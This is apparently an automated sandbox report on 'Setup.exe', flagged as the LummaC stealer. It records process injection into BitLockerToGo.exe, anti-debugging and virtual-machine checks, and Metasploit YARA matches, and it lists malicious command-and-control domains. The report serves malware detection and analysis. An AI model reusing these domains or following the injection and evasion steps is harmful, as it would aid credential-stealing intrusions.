    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49819 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49826 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49837 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49843 version: TLS 1.2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00436F40 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00436F40
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00436F40 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00436F40

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 00000000.00000003.2197228069.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
    Source: 00000000.00000002.2281733359.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004112A32_2_004112A3
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00443D4F2_2_00443D4F
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004010002_2_00401000
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041900F2_2_0041900F
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040F0C02_2_0040F0C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004150C02_2_004150C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040A0E02_2_0040A0E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004410E02_2_004410E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040B0F02_2_0040B0F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004320A32_2_004320A3
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004111002_2_00411100
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004301202_2_00430120
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004471F02_2_004471F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004202332_2_00420233
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004352D02_2_004352D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004252E22_2_004252E2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042C2EE2_2_0042C2EE
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004012F32_2_004012F3
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043C2A02_2_0043C2A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004452A02_2_004452A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004122B02_2_004122B0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040134E2_2_0040134E
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004293702_2_00429370
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004083202_2_00408320
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042D3272_2_0042D327
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004453F02_2_004453F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004444602_2_00444460
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040D4D02_2_0040D4D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004154972_2_00415497
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042B5002_2_0042B500
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004295002_2_00429500
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004355002_2_00435500
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004235102_2_00423510
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042D5302_2_0042D530
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041A5962_2_0041A596
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041C5962_2_0041C596
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040A5A02_2_0040A5A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004275B02_2_004275B0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004455B02_2_004455B0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004016022_2_00401602
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004316CE2_2_004316CE
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004037702_2_00403770
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004287702_2_00428770
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004457002_2_00445700
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042E7C22_2_0042E7C2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004207E02_2_004207E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004457F02_2_004457F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004448702_2_00444870
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040F8192_2_0040F819
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040D8C02_2_0040D8C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004078D02_2_004078D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042C8DA2_2_0042C8DA
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043B9702_2_0043B970
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042F9002_2_0042F900
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042C9312_2_0042C931
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004169822_2_00416982
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004329922_2_00432992
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004469902_2_00446990
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00421A602_2_00421A60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041FAC92_2_0041FAC9
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042BAF12_2_0042BAF1
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00436A902_2_00436A90
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041BAAE2_2_0041BAAE
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00445B202_2_00445B20
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043BBD02_2_0043BBD0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00411C5B2_2_00411C5B
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040AC602_2_0040AC60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00427C6E2_2_00427C6E
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040BC002_2_0040BC00
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00422C002_2_00422C00
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043CC172_2_0043CC17
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00423C302_2_00423C30
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00446C302_2_00446C30
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040ED402_2_0040ED40
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00444D602_2_00444D60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00408D702_2_00408D70
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041BD732_2_0041BD73
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042AD002_2_0042AD00
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00436D002_2_00436D00
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00404E602_2_00404E60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041EE2E2_2_0041EE2E
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00406ED02_2_00406ED0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00446F002_2_00446F00
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040DF70 appears 198 times
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040C720 appears 70 times
    Source: Setup.exe, 00000000.00000002.2279256146.0000000001E33000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs Setup.exe
    Source: Setup.exe, 00000000.00000002.2279698242.0000000003E98000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs Setup.exe
    Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000003.2197228069.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
    Source: 00000000.00000002.2281733359.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
    Source: classification engineClassification label: mal100.troj.evad.winEXE@3/4@11/9
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043C754 CoCreateInstance,CoCreateInstance,2_2_0043C754
    Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\jsii-runtime.3122541536Jump to behavior
    Source: Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Setup.exeReversingLabs: Detection: 15%
    Source: Setup.exeString found in binary or memory: github.com/aws/jsii-runtime-go@v1.103.1/internal/kernel/load.go
    Source: Setup.exeString found in binary or memory: github.com/aws/aws-cdk-go/awscdk/v2@v2.162.1/awsec2/LaunchTemplate.go
    Source: Setup.exeString found in binary or memory: github.com/aws/aws-cdk-go/awscdk/v2@v2.162.1/awsec2/LaunchTemplate__checks.go
    Source: Setup.exeString found in binary or memory: github.com/aws/aws-cdk-go/awscdk/v2@v2.162.1/awsec2/LaunchTemplateRequireImdsv2Aspect.go
    Source: Setup.exeString found in binary or memory: github.com/aws/aws-cdk-go/awscdk/v2@v2.162.1/awsec2/LaunchTemplateRequireImdsv2Aspect__checks.go
    Source: Setup.exeString found in binary or memory: net/addrselect.go
    Source: Setup.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
    Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
    Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: Setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: Setup.exeStatic file information: File size 25899008 > 1048576
    Source: Setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x9dac00
    Source: Setup.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xdbd200
    Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: BitLockerToGo.pdb source: Setup.exe, 00000000.00000002.2279698242.0000000003E98000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: BitLockerToGo.pdbGCTL source: Setup.exe, 00000000.00000002.2279698242.0000000003E98000.00000004.00001000.00020000.00000000.sdmp
    Source: Setup.exeStatic PE information: section name: .symtab
    Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Found evasive API chain checking for user administrative privileges
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_2-19219
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 4416Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: BitLockerToGo.exe, 00000002.00000003.2338992409.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Setup.exeBinary or memory string: (sensitive)OUT_OF_RANGElogrus_errorbase32hexpadbase58flickrbase64urlpadexcursion %sstart of mapJSII_RUNTIME<unknown:%d>Sfixed32KindSfixed64Kindmessage_typejava_packageoptimize_forswift_prefixruby_packagedebug_redactdouble_valuestring_valueverificationis_extensionRCodeSuccessRCodeRefusedunknown type = struct { caller errorFieldOptionsOneofOptionsprotobuf_keyprotobuf_valavx5124fmapsavx512bitalgFieldNumbersAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCLITE_RUNTIMESTRING_PIECEparsing time out of rangelatestVersionaddPermissioncfnPropertiescreationStackroutingConfigaddDependencycdkTagManagerscalingConfigarchitecturesloggingConfigrecursiveLooptracingConfigsourceAccountruntimePolicybundlingImageruntimeEqualsPROXY_HANDLERAddPermissionLatestVersionAddDependencyCfnPropertiesCreationStackRoutingConfigCdkTagManagerScalingConfigArchitecturesLoggingConfigRecursiveLoopTracingConfigSourceAccountRuntimePolicyBundlingImageRuntimeEqualsparameter valtargetAddressTargetAddressFindFirstFileunimplementedlevel 3 resetsrmount errortimer expiredexchange fullRegEnumKeyExWRegOpenKeyExWCertOpenStoreFindNextFileWMapViewOfFileVirtualUnlockWriteConsoleWFreeAddrInfoWgethostbynamegetservbynameWSACloseEventgethostbyaddrgetservbyportWSAResetEventWSAIsBlockingSysFreeStringSafeArrayLockSafeArrayCopyVarI2FromDateVarI2FromDispVarI2FromBoolVarI4FromDateVarI4FromDispVarI4FromBoolVarR4FromDateVarR4FromDispVarR4FromBoolVarR8FromDateVarR8FromDispVarR8FromBoolVarDateFromI2VarDateFromI4VarDateFromR4VarDateFromR8VarDateFromCyVarCyFromDateVarCyFromDispVarCyFromBoolVarBstrFromI2VarBstrFromI4VarBstrFromR4VarBstrFromR8VarBstrFromCyVarBoolFromI2VarBoolFromI4VarBoolFromR4VarBoolFromR8VarBoolFromCyVarUI1FromStrCreateTypeLibClearCustDataLoadTypeLibExVarDecFromUI1VarDecFromStrVarDateFromI1VarBstrFromI1VarBoolFromI1VarUI1FromUI2VarUI1FromUI4VarUI1FromDecVarDecFromUI2VarDecFromUI4VarI1FromDateVarI1FromDispVarI1FromBoolVarUI2FromUI1VarUI2FromStrVarUI2FromUI4VarUI2FromDecVarUI4FromUI1VarUI4FromStrVarUI4FromUI2VarUI4FromDecBSTR_UserSizeBSTR_UserFreeVarI8FromDateVarI8FromDispVarI8FromBoolVarDateFromI8VarBstrFromI8VarBoolFromI8VarUI1FromUI8VarDecFromUI8VarUI2FromUI8VarUI4FromUI8VarUI8FromUI1VarUI8FromStrVarUI8FromUI2VarUI8FromUI4VarUI8FromDecOMAP From SrcInterfaceImplStandAloneSigAssemblyRefOSEFI byte codeMIPS with FPUDebugStrippedHighEntropyVAEFI ROM imageRISC-V Low12sMIPS JMP AddrRISC-V Low 12Albanian (sq)Armenian (hy)Assamese (as)Corsican (co)Croatian (hr)Estonian (et)Galician (gl)Georgian (ka)Gujarati (gu)Japanese (ja)Kashmiri (ks)Konkani (kok)Quechua (quz)Romanian (ro)Sanskrit (sa)Setswana (tn)Tigrinya (ti)Contains CodeAlign128BytesAlign256BytesAlign512BytesExtendedRelocAlign 2-BytesAlign 4-BytesAlign 8-ByteswakeableSleepprofMemActiveprofMemFuturetraceStackTabexecRInternaltestRInternalGC sweep waitout of memory is nil, not value method
    Source: BitLockerToGo.exe, 00000002.00000002.2400111218.000000000319C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Setup.exe, 00000000.00000002.2279367148.0000000001E9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_2-19220
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00443090 LdrInitializeThunk,2_2_00443090

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Allocates memory in foreign processes
    Source: C:\Users\user\Desktop\Setup.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
    Injects a PE file into a foreign processes
    Source: C:\Users\user\Desktop\Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
    LummaC encrypted strings found
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: drawwyobstacw.sbs
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: condifendteu.sbs
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ehticsprocw.sbs
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: vennurviot.sbs
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: resinedyw.sbs
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: enlargkiw.sbs
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: allocatinow.sbs
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: mathcucom.sbs
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: divewanntwj.biz
    Writes to foreign memory regions
    Source: C:\Users\user\Desktop\Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2DD0008Jump to behavior
    Source: C:\Users\user\Desktop\Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
    Source: C:\Users\user\Desktop\Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
    Source: C:\Users\user\Desktop\Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 448000Jump to behavior
